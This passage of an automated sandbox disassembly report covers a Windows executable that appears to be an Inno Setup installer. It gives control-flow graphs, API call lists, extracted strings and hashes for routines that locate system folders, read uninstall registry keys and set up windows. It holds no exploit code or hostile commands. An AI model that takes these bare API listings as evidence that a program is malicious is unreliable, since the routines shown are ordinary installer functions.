                                                                                  • Not Executed
                                                                                  control_flow_graph 1051 492dec-492e20 call 403684 1054 492e22-492e31 call 447010 Sleep 1051->1054 1055 492e36-492e43 call 403684 1051->1055 1060 4932c6-4932e0 call 403420 1054->1060 1061 492e72-492e7f call 403684 1055->1061 1062 492e45-492e68 call 44706c call 403738 FindWindowA call 4472ec 1055->1062 1070 492eae-492ebb call 403684 1061->1070 1071 492e81-492ea9 call 44706c call 403738 FindWindowA call 4472ec 1061->1071 1080 492e6d 1062->1080 1078 492ebd-492eff call 447010 * 4 SendMessageA call 4472ec 1070->1078 1079 492f04-492f11 call 403684 1070->1079 1071->1060 1078->1060 1088 492f60-492f6d call 403684 1079->1088 1089 492f13-492f5b call 447010 * 4 PostMessageA call 447144 1079->1089 1080->1060 1100 492fbc-492fc9 call 403684 1088->1100 1101 492f6f-492fb7 call 447010 * 4 SendNotifyMessageA call 447144 1088->1101 1089->1060 1113 492fcb-492ff1 call 44706c call 403738 RegisterClipboardFormatA call 4472ec 1100->1113 1114 492ff6-493003 call 403684 1100->1114 1101->1060 1113->1060 1126 493005-49303f call 447010 * 3 SendMessageA call 4472ec 1114->1126 1127 493044-493051 call 403684 1114->1127 1126->1060 1139 493098-4930a5 call 403684 1127->1139 1140 493053-493093 call 447010 * 3 PostMessageA call 447144 1127->1140 1152 4930ec-4930f9 call 403684 1139->1152 1153 4930a7-4930e7 call 447010 * 3 SendNotifyMessageA call 447144 1139->1153 1140->1060 1164 4930fb-493119 call 44706c call 42e3a4 1152->1164 1165 49314e-49315b call 403684 1152->1165 1153->1060 1182 49312b-493139 GetLastError call 4472ec 1164->1182 1183 49311b-493129 call 4472ec 1164->1183 1175 49315d-493189 call 44706c call 403738 call 447010 GetProcAddress 1165->1175 1176 4931d5-4931e2 call 403684 1165->1176 1207 49318b-4931c0 call 447010 * 2 call 4472ec call 447144 1175->1207 1208 4931c5-4931d0 call 447144 1175->1208 1188 49320a-493217 call 403684 1176->1188 1189 4931e4-493205 call 447010 FreeLibrary call 447144 1176->1189 1194 49313e-493149 call 4472ec 1182->1194 1183->1194 1204 493219-493237 call 44706c call 403738 CreateMutexA 1188->1204 1205 49323c-493249 call 403684 1188->1205 1189->1060 1194->1060 1204->1060 1215 49324b-49327d call 48d220 call 403574 call 403738 OemToCharBuffA call 48d238 1205->1215 1216 49327f-49328c call 403684 1205->1216 1207->1060 1208->1060 1215->1060 1228 49328e-4932c0 call 48d220 call 403574 call 403738 CharToOemBuffA call 48d238 1216->1228 1229 4932c2 1216->1229 1228->1060 1229->1060
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,00000000,004932E1,?,?,?,?,00000000,00000000,00000000), ref: 00492E2C
                                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00492E5D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindSleepWindow
                                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                  • API String ID: 3078808852-3310373309
                                                                                  • Opcode ID: 8cf265b3f066c72d7016e9308515d3dcb7ecb2149754d0420987ba3a70bb973f
                                                                                  • Instruction ID: 0de698378398c76d082fe6c781760205a02602346193583708d777b6c814c377
                                                                                  • Opcode Fuzzy Hash: 8cf265b3f066c72d7016e9308515d3dcb7ecb2149754d0420987ba3a70bb973f
                                                                                  • Instruction Fuzzy Hash: C9C18360B0821067DB14BF7E8C4261E5A999F99B05710CD7FB446EB38BCE3DDE0A425D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1621 483f60-483f85 GetModuleHandleA GetProcAddress 1622 483fec-483ff1 GetSystemInfo 1621->1622 1623 483f87-483f9d GetNativeSystemInfo GetProcAddress 1621->1623 1624 483ff6-483fff 1622->1624 1623->1624 1625 483f9f-483faa GetCurrentProcess 1623->1625 1626 48400f-484016 1624->1626 1627 484001-484005 1624->1627 1625->1624 1634 483fac-483fb0 1625->1634 1630 484031-484036 1626->1630 1628 484018-48401f 1627->1628 1629 484007-48400b 1627->1629 1628->1630 1632 48400d-48402a 1629->1632 1633 484021-484028 1629->1633 1632->1630 1633->1630 1634->1624 1635 483fb2-483fb9 call 452790 1634->1635 1635->1624 1639 483fbb-483fc8 GetProcAddress 1635->1639 1639->1624 1640 483fca-483fe1 GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483fe3-483fea 1640->1641 1641->1624
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483F71
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483F7E
                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483F8C
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483F94
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483FA0
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483FC1
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483FD4
                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483FDA
                                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483FF1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                  • API String ID: 2230631259-2623177817
                                                                                  • Opcode ID: 2201496c5c445ff8090de454bf6ebb37dd8ee277a0fffd9fa5a8cd1afd0d38d8
                                                                                  • Instruction ID: debdefcd9c900846d3217bdd74a69f8d0e186994afde8710a0eb2db1caaea97a
                                                                                  • Opcode Fuzzy Hash: 2201496c5c445ff8090de454bf6ebb37dd8ee277a0fffd9fa5a8cd1afd0d38d8
                                                                                  • Instruction Fuzzy Hash: 9E11E95180C74391D62177784C0676F2A988B92B59F080C377F80692C3DEBCC989A3AF

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1647 468e4c-468e84 call 47c6f0 1650 469066-469080 call 403420 1647->1650 1651 468e8a-468e9a call 479260 1647->1651 1656 468e9f-468ee4 call 407904 call 403738 call 42de2c 1651->1656 1662 468ee9-468eeb 1656->1662 1663 468ef1-468f06 1662->1663 1664 46905c-469060 1662->1664 1665 468f1b-468f22 1663->1665 1666 468f08-468f16 call 42dd5c 1663->1666 1664->1650 1664->1656 1668 468f24-468f46 call 42dd5c call 42dd74 1665->1668 1669 468f4f-468f56 1665->1669 1666->1665 1668->1669 1686 468f48 1668->1686 1670 468faf-468fb6 1669->1670 1671 468f58-468f7d call 42dd5c * 2 1669->1671 1674 468ffc-469003 1670->1674 1675 468fb8-468fca call 42dd5c 1670->1675 1694 468f7f-468f88 call 43156c 1671->1694 1695 468f8d-468f9f call 42dd5c 1671->1695 1680 469005-469039 call 42dd5c * 3 1674->1680 1681 46903e-469054 RegCloseKey 1674->1681 1687 468fcc-468fd5 call 43156c 1675->1687 1688 468fda-468fec call 42dd5c 1675->1688 1680->1681 1686->1669 1687->1688 1688->1674 1701 468fee-468ff7 call 43156c 1688->1701 1694->1695 1695->1670 1704 468fa1-468faa call 43156c 1695->1704 1701->1674 1704->1670
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,00469066,?,?,00000001,00000000,00000000,00469081,?,00000000,00000000,?), ref: 0046904F
                                                                                  Strings
                                                                                  • Inno Setup: Selected Components, xrefs: 00468F6E
                                                                                  • Inno Setup: Selected Tasks, xrefs: 00468FBB
                                                                                  • %s\%s_is1, xrefs: 00468EC9
                                                                                  • Inno Setup: User Info: Serial, xrefs: 00469031
                                                                                  • Inno Setup: User Info: Name, xrefs: 0046900B
                                                                                  • Inno Setup: Setup Type, xrefs: 00468F5E
                                                                                  • Inno Setup: App Path, xrefs: 00468F0E
                                                                                  • Inno Setup: Icon Group, xrefs: 00468F2A
                                                                                  • Inno Setup: Deselected Components, xrefs: 00468F90
                                                                                  • Inno Setup: User Info: Organization, xrefs: 0046901E
                                                                                  • Inno Setup: No Icons, xrefs: 00468F37
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468EAB
                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00468FDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                  • API String ID: 47109696-1093091907
                                                                                  • Opcode ID: 7a93acda2f234d471220428d4004ddf5d74bfeca7ecd8adbdaba36eec9f3c1ba
                                                                                  • Instruction ID: ec004eca3ef3c75e9be151f7b3ffcc37546afe520acb5c6156e930094c0c3bde
                                                                                  • Opcode Fuzzy Hash: 7a93acda2f234d471220428d4004ddf5d74bfeca7ecd8adbdaba36eec9f3c1ba
                                                                                  • Instruction Fuzzy Hash: CA51C630A006089FDB15DB65D941BDEB7F9EF49304F6084ABE840673A1E7786F05CB4A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0042D8A8: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453E28,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D), ref: 0042D8BB
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                    • Part of subcall function 0042D900: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453BCE,00000000,00453C71,?,?,00000000,00000000,00000000,00000000,00000000,?,00454061,00000000), ref: 0042D91A
                                                                                    • Part of subcall function 0042D900: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                  • SHGetKnownFolderPath.SHELL32(0049AD30,00008000,00000000,?,00000000,0047CDC6), ref: 0047CCCA
                                                                                  • CoTaskMemFree.OLE32(?,0047CD0F), ref: 0047CD02
                                                                                    • Part of subcall function 0042D218: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA4E,00000000,0042DAE0,?,?,?,0049C628,00000000,00000000), ref: 0042D243
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                  • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                  • API String ID: 3771764029-544719455
                                                                                  • Opcode ID: c632660a73aa2456bea4c2f675731a15cac3be8b36c890987e871e9594b1d94f
                                                                                  • Instruction ID: 266a5e1eeddd24a6ff800b9f6f3b1db768c176bc66f8c93c3bb1332691642a31
                                                                                  • Opcode Fuzzy Hash: c632660a73aa2456bea4c2f675731a15cac3be8b36c890987e871e9594b1d94f
                                                                                  • Instruction Fuzzy Hash: 5C61A235A00204AFDB20FBA5E882A8E7F69EB45718F50C47FE448A7395C73C9A45CB5D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2060 47d2fc-47d352 call 42c40c call 4035c0 call 47cfc0 call 45264c 2069 47d354-47d359 call 4533b8 2060->2069 2070 47d35e-47d36d call 45264c 2060->2070 2069->2070 2074 47d387-47d38d 2070->2074 2075 47d36f-47d375 2070->2075 2078 47d3a4-47d3cc call 42e3a4 * 2 2074->2078 2079 47d38f-47d395 2074->2079 2076 47d397-47d39f call 403494 2075->2076 2077 47d377-47d37d 2075->2077 2076->2078 2077->2074 2080 47d37f-47d385 2077->2080 2086 47d3f3-47d40d GetProcAddress 2078->2086 2087 47d3ce-47d3ee call 407904 call 4533b8 2078->2087 2079->2076 2079->2078 2080->2074 2080->2076 2089 47d40f-47d414 call 4533b8 2086->2089 2090 47d419-47d436 call 403400 * 2 2086->2090 2087->2086 2089->2090
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74A90000,SHGetFolderPathA), ref: 0047D3FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                  • API String ID: 190572456-1343262939
                                                                                  • Opcode ID: 4c4f5370a674afad61a8abff597dcb6413460b1fd753ed450c61900bf845ad3d
                                                                                  • Instruction ID: d045dd866038c92064cf829f06b82d6aceddf0eaafaeaf0ab83e85e2faf6b2a6
                                                                                  • Opcode Fuzzy Hash: 4c4f5370a674afad61a8abff597dcb6413460b1fd753ed450c61900bf845ad3d
                                                                                  • Instruction Fuzzy Hash: 67311B70E10149AFCB10EFA9D9819EEB7B5EF44319F50847BE848E7341D738AE058B69

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2098 40632c-406346 GetModuleHandleA GetProcAddress 2099 406348 2098->2099 2100 40634f-40635c GetProcAddress 2098->2100 2099->2100 2101 406365-406372 GetProcAddress 2100->2101 2102 40635e 2100->2102 2103 406374-406376 SetProcessDEPPolicy 2101->2103 2104 406378-406379 2101->2104 2102->2101 2103->2104
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00499298), ref: 00406332
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040633F
                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406355
                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040636B
                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00499298), ref: 00406376
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                  • API String ID: 3256987805-3653653586
                                                                                  • Opcode ID: 7d7bbe465618e4585c438ef3b206e32c98bc9d4bad24831f1f4b353394e5164f
                                                                                  • Instruction ID: 9a8e57213fbd449cbda58cf554ac4ead7a6b18060d135b7a086c7f718c4e9984
                                                                                  • Opcode Fuzzy Hash: 7d7bbe465618e4585c438ef3b206e32c98bc9d4bad24831f1f4b353394e5164f
                                                                                  • Instruction Fuzzy Hash: C6E02DA1380701A8EA1032B20D82F3B104C8B40B69B2A24377D96B45C7DABEDD6455BD

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2105 423884-42388e 2106 4239b7-4239bb 2105->2106 2107 423894-4238b6 call 41f3d4 GetClassInfoA 2105->2107 2110 4238e7-4238f0 GetSystemMetrics 2107->2110 2111 4238b8-4238cf RegisterClassA 2107->2111 2113 4238f2 2110->2113 2114 4238f5-4238ff GetSystemMetrics 2110->2114 2111->2110 2112 4238d1-4238e2 call 408ccc call 40311c 2111->2112 2112->2110 2113->2114 2116 423901 2114->2116 2117 423904-423960 call 403738 call 4062f8 call 403400 call 42365c SetWindowLongA 2114->2117 2116->2117 2128 423962-423975 call 424188 SendMessageA 2117->2128 2129 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2117->2129 2128->2129 2129->2106 2131 4239aa-4239b2 DeleteMenu 2129->2131 2131->2106
                                                                                  APIs
                                                                                    • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                  • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                  • RegisterClassA.USER32(0049A630), ref: 004238C7
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                  • SetWindowLongA.USER32(00410470,000000FC,0042369C), ref: 00423954
                                                                                  • SendMessageA.USER32(00410470,00000080,00000001,00000000), ref: 00423975
                                                                                  • GetSystemMenu.USER32(00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410470,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                  • String ID:
                                                                                  • API String ID: 183575631-0
                                                                                  • Opcode ID: dcf1e4bb608db0b13c9ea2834524852589dee19fdd42878d22a9146a5775872e
                                                                                  • Instruction ID: 82f3192e6ade9fc2431bdc17690f87bdde911e200ecbc62aa143bb8a1c16cd18
                                                                                  • Opcode Fuzzy Hash: dcf1e4bb608db0b13c9ea2834524852589dee19fdd42878d22a9146a5775872e
                                                                                  • Instruction Fuzzy Hash: A93177B17402106AE710BFA5DC82F6636989714709F54017BFA44EF2D7C6BDED40876D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2133 42f5d4-42f5de 2134 42f5e0-42f5e3 call 402d30 2133->2134 2135 42f5e8-42f625 call 402b30 GetActiveWindow GetFocus call 41eeb4 2133->2135 2134->2135 2141 42f637-42f63f 2135->2141 2142 42f627-42f631 RegisterClassA 2135->2142 2143 42f6c6-42f6e2 SetFocus call 403400 2141->2143 2144 42f645-42f676 CreateWindowExA 2141->2144 2142->2141 2144->2143 2146 42f678-42f6bc call 42428c call 403738 CreateWindowExA 2144->2146 2146->2143 2152 42f6be-42f6c1 ShowWindow 2146->2152 2152->2143
                                                                                  APIs
                                                                                  • GetActiveWindow.USER32 ref: 0042F603
                                                                                  • GetFocus.USER32 ref: 0042F60B
                                                                                  • RegisterClassA.USER32(0049A7AC), ref: 0042F62C
                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F700,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F66A
                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F6B0
                                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F6C1
                                                                                  • SetFocus.USER32(00000000,00000000,0042F6E3,?,?,?,00000001,00000000,?,004583FA,00000000,0049C628), ref: 0042F6C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                  • String ID: TWindowDisabler-Window
                                                                                  • API String ID: 3167913817-1824977358
                                                                                  • Opcode ID: 329e45f8b9a76be32e2a3852da0fb01f5e5fb6a649be07f73332a055a5178ca6
                                                                                  • Instruction ID: d29da226113d58e61871af9e0701154b32a21c5c31e3c64538275018e3c6a7a6
                                                                                  • Opcode Fuzzy Hash: 329e45f8b9a76be32e2a3852da0fb01f5e5fb6a649be07f73332a055a5178ca6
                                                                                  • Instruction Fuzzy Hash: 35219771740710BAE210EFA59C43F1A76B4EF04B54F91413BF504AB2E1D7B95C1587AD

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2153 453264-4532b5 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2154 4532b7-4532be 2153->2154 2155 4532c0-4532c2 2153->2155 2154->2155 2156 4532c4 2154->2156 2157 4532c6-4532fc call 42e3a4 call 42e8d8 call 403400 2155->2157 2156->2157
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 00453284
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045328A
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 0045329E
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004532A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
